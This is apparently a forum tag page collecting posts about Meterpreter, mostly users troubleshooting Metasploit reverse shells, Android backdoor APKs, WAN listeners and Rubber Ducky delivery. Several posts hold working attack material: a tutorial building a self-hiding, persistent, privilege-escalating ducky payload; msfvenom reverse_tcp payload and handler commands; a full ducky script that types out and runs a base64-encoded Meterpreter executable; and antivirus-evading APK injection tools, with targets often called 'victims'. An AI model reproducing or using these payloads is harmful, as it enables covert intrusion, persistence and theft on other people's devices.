Showing results for tags 'meterpreter'.


  1. On the lan turtle I can catch multiple python/meterpreter/reverse_https sessions that are just dead on arrival. Am I doing something wrong?
  2. NOTE: THIS IS COMPLETELY FOR EDUCATIONAL PURPOSES AND I AM NOT TRYING TO HACK ANY DEVICE RIGHT NOW TO CREATE PROBLEMS FOR SOMEONE. THE PHONE I AM TRYING TO EXPLOIT IS MY OWN SECOND DEVICE. I'm working with Metasploit on Termux. My meterpreter session is open. I am able to access the SD card of the phone I am trying to exploit, but every time I need to exploit the device, one needs to tap the app icon for my meterpreter session to start. I want to make my payload persistent, so that I don't have to wait for the user of the device to tap the icon again. So, I successfully created a bash file through "nano" which is named "syslogs.sh" and is placed on my SD card. It works completely fine; it contacts the device for my meterpreter session to start after a delay of every 20 seconds. So, I want to upload my syslogs.sh file from my SD card to the SD card of the device which I'm trying to exploit, but it's just not happening! I am getting an error like this:

         [-] 4 : Operation failed: 1

     You can refer to this image here. You can see here that I've also tried adding backslashes but it didn't seem to work. The location of my file is absolutely fine. If someone wants to know exactly what I'm trying to implement they can check this. I've honestly tried searching for solutions, I've seen previous solutions and posted my question on subreddits, Stack Overflow and GitHub, but I'm not getting anything. I am really positive that you guys can help me. I would highly appreciate ANY KIND OF SUGGESTION. I am absolutely new to this forum so if I've posted something wrong or I'm in the wrong place you can always let me know and I'll delete this post. Hoping for your replies.
  3. I'm pretty new to Metasploit but I have what appears to be a successful shell/session created however there is no prompt (normal commands return nothing) and I see that it shows only the default route (0.0.0.0:0) between my computer and the target. I did input my LHOST though it is a staged bind shell payload (inline payload shells produce the same result and meterpreter payloads don't work). Is it possible to obtain a full interactive shell?

         msf5 exploit(windows/dcerpc/ms03_026_dcom) > run

         [*] 10.XX.XX.XX:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
         [*] 10.XX.XX.XX:135 - Binding to ZZ@ff_ip_tcp:10.XX.XX.XX[135] ...
         [*] 10.XX.XX.XX:135 - Bound to ZZ@ff_ip_tcp:10.XX.XX.XX[135] ...
         [*] 10.XX.XX.XX:135 - Sending exploit ...
         [*] Started bind TCP handler against 10.XX.XX.XX:135
         [*] Encoded stage with x86/shikata_ga_nai
         [*] Sending encoded stage (267 bytes) to 10.XX.XX.XX
         [*] Command shell session 1 opened (0.0.0.0:0 -> 10.XX.XX.XX:135) at 2020-07-21 14:50:17 -0600

         background
         Background session 1? [y/N] y
         msf5 exploit(windows/dcerpc/ms03_026_dcom) > sessions -i

         Active sessions
         ===============

           Id  Name  Type               Information  Connection
           --  ----  ----               -----------  ----------
           1         shell x86/windows               0.0.0.0:0 -> 10.XX.XX.XX:135 (10.XX.XX.XX)

         msf5 exploit(windows/dcerpc/ms03_026_dcom) >
  4. I don't get it.... Do I have to install meterpreter directly on the WiFi Pineapple or on another machine? #ssh Would be no problem, I would even have a Raspberry Pi that Metasploit runs on. But every time I enter the login data of my "Home Network-Raspberry Pi" on the API of the Pineapple Meterpreter Module, nothing happens at all!
  5. Hi, I'm reasonably new to using Metasploit and can create an .apk with a reverse shell without any issues, but when I upload it to my test Android running 8.1, it does not open a connection. It lets me install it but gives no option to open, and when I click the icon, again nothing happens. I have tried signing the apk as well as binding it to an original application but still nothing. When I bound it to an original application, the app opened and the game worked but no connection was created. I have given the individual apps the permissions to install from unknown sources too. Can anybody suggest what is wrong? Much appreciated...
  6. Can I run a payload (meterpreter) (Metasploit) on Android with Rubber Ducky or Bash Bunny over WAN?
  7. Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PCs with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later).

     What the executable does:

     - Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user.
     - Depending on privilege level, either continue execution or attempt to elevate. (If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y')
     - Copies itself and required DLLs to the default TEMP directory, and sets all of those files to be hidden.
     - Creates a hidden Task Scheduler task which runs the executable on each user logon.
     - Executes encoded Powershell payload.

     Why smart privilege checking is important:

     If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear:

     This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell.

     Now if a user is part of the admin group then we see a dialog like this:

     This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use meterpreter's 'getsystem' command and we're away!

     Tutorial:

     What you'll need:

     - Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft).
     - Linux based PC/VM for generating our payload/listening for connections. Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload.
     - USB Rubber ducky (with Twin Duck or similar firmware installed)
     - This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it before)

     Let's start:

     - On the Kali Linux side of things let's open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'.
     - You will be presented with various options, hit '1' and then enter.
     - Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter.
     - More options, hit '1' and then enter.
     - Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding)
     - Give it a port and then say 'yes' when it asks if you want to start the listener.
     - Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/'
     - You have just started a webserver on port 80. Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt' You should be faced with this screen:
     - Select all the text and copy it.
     - Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file:
     - Go to the line with the pre-inserted Powershell payload (Line 64):
     - Replace the text within the double quotes with your payload you got from the web server earlier.
     - Go to the build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them.
     - Navigate to the path it gives at the bottom in the console window to find the DLLs and exe file we need.
     - Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive.
     - Now we need our ducky payload, here is the code:

         REM Awesome script
         DELAY 500
         GUI R
         DELAY 50
         STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe"
         DELAY 50
         ENTER
         DELAY 1500
         ALT Y
         DELAY 1000
         STRING exit
         DELAY 50
         ENTER
         DELAY 50
         STRING exit
         DELAY 50
         ENTER

     - Generate your inject.bin file with an encoder.
     - Copy the inject.bin to your Ducky's drive and there we have it!

     Some caveats:

     - The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script.
     - Slower PCs may need slightly longer delays in the ducky script, but hey, just experiment until it works!

     So tell me what you think, feedback is greatly appreciated!
  8. Hi, I use a Pineapple NANO with the latest firmware. I would like to know how to add code into the Evil Portal module to obtain a meterpreter session when the "victim" tries to authenticate. Could someone help me? Best regards, Michael
  9. Hey there! I am Luuk, a 14 year old boy who's very interested in cyber security. When I was little [smaller] ;] I always dreamed about being a cool hacker. About 1 year ago I decided to start, so I made a USB with Kali Linux on it and I learned the basics of Metasploit [meterpreter payloads]. I also discovered how to hide a virus from a lot of AV like Windows Defender. I also learned the basic commands of the terminal and working with Armitage. But I have 1 problem ;[ Every time I want to start a listener I make the payload like this:

         msfvenom -p windows/meterpreter/reverse_tcp LHOST=tcp.ngrok.io LPORT=the port of ngrok -f exe > payload.exe

     So that's done and I wanted to start a listener. I open Metasploit and type:

         use multi/handler
         set payload windows/meterpreter/reverse_tcp
         set lhost 127.0.0.1
         set lport 80
         exploit

     OK, so a few months ago it would say started reverse handler ........ and it started to listen. Now it says started reverse handler and a new line is opened. What!!! What's going on? When I search the job with services it's listening, but when I type run {job number} it says did you wanted a reversebindlistenadress Failed to bind 127.0.0.1 failed to bind 0.0.0.0. So that's my problem. Oh, extra note: I use ngrok for meterpreter over WAN {I can't port forward for some reason}. It would be great if I can get an answer. Thanks and happy hacking!
  10. Hello! I would like to ask if there is any way to use meterpreter directly from the Bash Bunny with Metasploit over WAN after I have infected a machine. And also if S.E.T is working :) Thanks in advance :)
  11. I have been trying to get a meterpreter session over WAN using a reverse TCP attack for a while now and I'm pretty stuck. My attack works fine on LAN and I have port forwarding set up to send the session to my listener on port 4444. I can get a netcat session over WAN so I know the port forwarding is set up correctly, but meterpreter doesn't seem to be receiving any connections. Any thoughts?
  12. blackcoat

    Meterpreter

    FUD backdoor with Pwnwinds with bat format + PowerShell is not connecting with the Metasploit listener. The backdoor was made by TheFatRat. Connection type: reverse https. Attacked VirtualBox OS type: Windows 10.
  13. Hello everyone, I am new here - this is my very first post. I hope it's in the correct section! Anyway, the past week I have been wanting to port forward in order to be able to start an external session (get into meterpreter when the victim is not using my IP). However, it turns out that port forwarding isn't possible on IPv6 - in fact, it WOULD work if the victim uses IPv6 as well. I haven't confirmed that, anyway. (Please correct me if I am wrong here.) My question is, is there any way to start a session as an IPv6 user, as in maybe an exploit that can do it? I usually use the multi/handler exploit, with the windows/meterpreter/reverse_tcp payload (also tried reverse_ipv6_tcp). If someone can help me or respond to this thread I will highly appreciate it! Thank you!
  14. Hi guys, Anyone know how I can get shell access in using any modern browsers (Chrome, IE, Firefox, etc. so that the browser doesn't bitch at me and say I need to upgrade to latest browser version) by browsing to a URL? I tried putting a malicious iframe on my evil portal and using these exploits: auxiliary/server/browser_autopwn, auxiliary/server/browser_autopwn2. I even tried downgrading to IE 8 then using the exploit: exploit/windows/browser/ms10_002_aurora. But so far I got nothing. :( No meterpreter sessions. This is for a presentation, by the way. Any of you guys suggest a different way? I am desperate. Wait not really. Just really frustrated. Hope someone can help. Thanks in advance!
  15. Bro, I made a payload in Metasploit using ngrok without port forwarding so that I can go WAN... but in ngrok the port gets changed every time I open it... so I need to make the payload again and again and send it to the victim... is there any way I can overcome this?
  16. I'm trying to exploit my rooted Galaxy Core Prime which is vulnerable to the exploit/unix/x11/x11_keyboard_exec module. I'm having a bit of trouble getting a shell. I've got to the point where a session is created, but when I try to interact with the session to get a shell it just stops and hangs and does nothing. I've tried different payloads but the same thing happens every time. It just says interacting with session <ID>, and I can't get any further than that. Any tips or help would be appreciated. And I'm also a bit confused about configuring the reverse shell payload. Is the LHOST supposed to be my IP or the victim's in a reverse shell? Plus, what is the proper IP and port number for "ReverseListenerBindAddress" and "ReverseListenerBindPort"? Thank you.
  17. Hi!! I get this error when I try to run the record_mic command in my meterpreter session: Error running command record_mic: NoMethodError undefined method 'value' for nil: NilClass What am I doing wrong? Thanks!!!
  18. I just created a sample Android backdoor, it's called apkgue.apk. After I ran it on my phone (Android) I got stuck at the next step.. the meterpreter > doesn't show.. why? Any help for me? Thanks..

          msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk
          [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk

          No platform was selected, choosing Msf::Module::Platform::Android from the payload
          No Arch selected, selecting Arch: dalvik from the payload
          No encoder or badchars specified, outputting raw payload
          Payload size: 8809 bytes

          msf > use exploit/multi/handler
          msf exploit(handler) > set payload android/meterpreter/reverse_tcp
          payload => android/meterpreter/reverse_tcp
          msf exploit(handler) > set lhost 192.168.43.128
          lhost => 192.168.43.128
          msf exploit(handler) > set lport 3344
          lport => 3344
          msf exploit(handler) > show options

          Module options (exploit/multi/handler):

             Name  Current Setting  Required  Description
             ----  ---------------  --------  -----------

          Payload options (android/meterpreter/reverse_tcp):

             Name   Current Setting  Required  Description
             ----   ---------------  --------  -----------
             LHOST  192.168.43.128   yes       The listen address
             LPORT  3344             yes       The listen port

          Exploit target:

             Id  Name
             --  ----
             0   Wildcard Target

          msf exploit(handler) > exploit
          [*] Exploit running as background job 0.
          [*] Started reverse TCP handler on 192.168.43.128:3344
          msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1
          [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
  19. Hi! I'm trying to get into a Windows 10 64x computer in the same LAN as another 86x PC with Kali Linux. Once I finally get into the target PC (W10) and the meterpreter session is open, the meterpreter session command prompt doesn't appear, I mean, I don't get the meterpreter> command prompt... What am I doing wrong? Thanks!!
  20. So I literally just finished copying this tutorial ... https://www.youtube.com/watch?v=fmRRX7-G4lc And everything went smoothly... Apart from when I plugged in the duck... Nothing happened on my Kali MSF... No shells were caught? I should first off mention that my target machine was actually a 64 bit Windows, so I had to change the msfvenom -a to x64 and change the payload to windows/x64/meterpreter/reverse_tcp... But besides that everything went OK... So because the shell wasn't being caught, I decided to open up PowerShell myself, and manually type in the code that the ducky inject.bin is trying to run in PowerShell.... and I got this error... So I think the reason nothing happens when I plug the duck in is because in the background (because obviously it is commanded to be hidden in the inject.bin) this is happening... making MSF not catch a shell... Please could anyone take a look at this and help me overcome this error. I would be forever grateful! Thank you Hak5 enthusiasts! <3
  21. Hello everyone, This weekend I got a little bored and began toying with Android payloads to just toy with a meterpreter shell to see how it is. Upon doing so, I noticed the payload generated from msfvenom required I ignore my AV to install. So this sent me down a path to bypass antivirus, which come to find out WAS EXTREMELY EASY! I began with apkwash, which simply takes the msfvenom generated payload and modifies it to bypass AV. The result... 0/35 on nodistribute and confirmed manually with AVG Mobile and Kaspersky Mobile. Nice! Perfect for having physical access to a device. Now if only a ducky script could auto-download and install the payload that would make this awesome. Otherwise, you would need a couple minutes alone with their unlocked phone.

      Then I was wondering about attempts without having physical access. You would want a more convincing app to install. What better way other than injecting the same AV bypassing payload into a legit app? Well, some people had examples on how to do this online, but required a long process to manually do it all. Why not script it? Well, each app is different so this can be hit or miss so I allowed manual pieces for those special apps. The result was apkinjector, which with utilizing the apkwash technique of AV bypass is able to make a hidden payload inside another APK. Perfect! Now, the downfall to this is APKTool has issues with certain packages (Facebook, Starbucks, etc). I have had success injecting into about 70-80% of .apk files.

      Github:
      https://github.com/jbreed/apkwash
      https://github.com/jbreed/apkinjector
  22. I was a little curious about the PrependMigrate option for meterpreter. I was trying to migrate to iexplore.exe or MicrosoftEdge.exe. But I'm not sure how to set the PrependMigrateProc option when generating my payload. I'm mostly confused on the path for the program I want to migrate to. If I use the program name it just doesn't work. When I use the full path it throws a different error like my syntax is wrong. Any ideas?

          msfvenom -p windows/meterpreter/reverse_hop_http -e x86/shikata_ga_nai -i 3 PrependMigrate true PrependMigrateProc "C:\Program Files\Internet Explorer\iexplore.exe" --platform win HOPURL=http://192.168.1.10/hop.php EXTENSIONS=stdapi,priv -f raw -o /root/Desktop/radpayload.raw

  23. Hi, I've been trying to upload a .vbs file to a remote machine in a meterpreter session without success. This problem also occurs with .exe files so it's not the .vbs file type not being supported. I've tried this:

          upload root/Desktop/program.vbs c:\\Users\\i7479\\Desktop

      This returns:

          [-] Error running command upload: Errno:ENOENT No such file or directory @ rb__file_s__stat - root/Desktop/program.vbs

      The paths for these files are both correct, it just can't find the program to be uploaded... Does anyone know how to carry this out? Should such a basic command be so tricky to execute? This doesn't work on Armitage (GUI) either btw...
  24. So I have seen people having issues with doing a download of a meterpreter payload and getting it to run from the ducky. I went for a different approach. I decided to try to modify this script from the wiki (I think Darren did a segment on it) in a different way. Here is what I came up with.

      Create the exe from msfvenom with the parms to connect to the metasploit handler
      Encode the exe with base64
      Edit the encoding to be duckyfied
      Append the duckyfied encoded exe to met.txt
      Append last.txt to met.txt
      Duckyencoder to make the inject.bin
      Place on ducky sdcard
      ... win

          msfvenom -a x86 --platform windows \
          -p windows/meterpreter/reverse_tcp \
          LHOST=IP_ADDRESS \
          LPORT=PORT \
          PREPENDMIGRATE=true \
          PREPENDMIGRATEPROC=notepad.exe \
          ReverseConnectRetries=20 \
          -b '\x00' \
          -e x86/shikata_ga_nai \
          -f exe |\
          base64 > bad_exe.txt
          sed -e 's/^/STRING /' -e '/STRING/ a ENTER' bad_exe.txt >> met.txt
          cat last.txt >> met.txt
          java -jar encoder.jar -i met.txt -o inject.bin

      Contents of met.txt

          ESCAPE
          CONTROL ESCAPE
          DELAY 400
          STRING cmd
          DELAY 400
          MENU
          DELAY 400
          STRING a
          DELAY 600
          LEFTARROW
          ENTER
          DELAY 400
          STRING copy con c:\decoder.vbs
          ENTER
          STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
          STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
          STRING CreateObject("Scripting.FileSystemObject"):
          ENTER
          STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
          STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
          STRING decodeBase64(base64):
          ENTER
          STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
          STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
          STRING writeBytes(file, bytes):Dim binaryStream:
          ENTER
          STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
          STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
          ENTER
          CTRL z
          ENTER
          STRING copy con c:\bad_exe.txt
          ENTER

      Contents of last.txt

          CTRL z
          ENTER
          STRING cscript c:\decoder.vbs c:\bad_exe.txt c:\bad.exe
          ENTER
          STRING c:\bad.exe
          ENTER
          STRING exit
          ENTER

  25. Hi... I have a problem, hope somebody can help me! OK... I have created a Reverse TCP DNS payload with MSFVenom... Now I want to execute this file by plugging in the USB Rubber Ducky! How do I do this? Do I have to convert my payload with Base64? And if yes, how could I do this? Please help me!